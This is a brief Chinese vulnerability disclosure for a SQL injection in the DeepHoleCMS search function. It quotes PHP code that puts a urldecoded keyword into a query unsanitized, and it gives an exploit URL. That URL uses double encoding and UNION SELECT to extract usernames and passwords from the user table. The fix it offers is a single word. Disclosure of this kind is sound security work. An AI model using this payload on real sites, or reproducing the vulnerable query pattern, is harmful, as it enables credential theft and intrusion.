简要描述:
深喉cms中由于对
数据处理不严导致一个SQL注射
漏洞 详细说明:
global $db,$request;
$keyword = urldecode($request['keyword']);
switch($modelName)
{
case 'article':
$sql = "select * from `".TB_PREFIX."article` where pageName like '%$keyword%' or content like '%$keyword%' order by id desc";
return $db->get_results($sql);
break;
注射有木有,有木有!!!
http://www.****.com /foo/?p=24;m=search;keyword=aaa%2527%20union%20select%201,2,3,4,username,6,7,pwd,9,10,11,12,13%20from%20shl_user%23
漏洞证明:
修复方案:
过滤
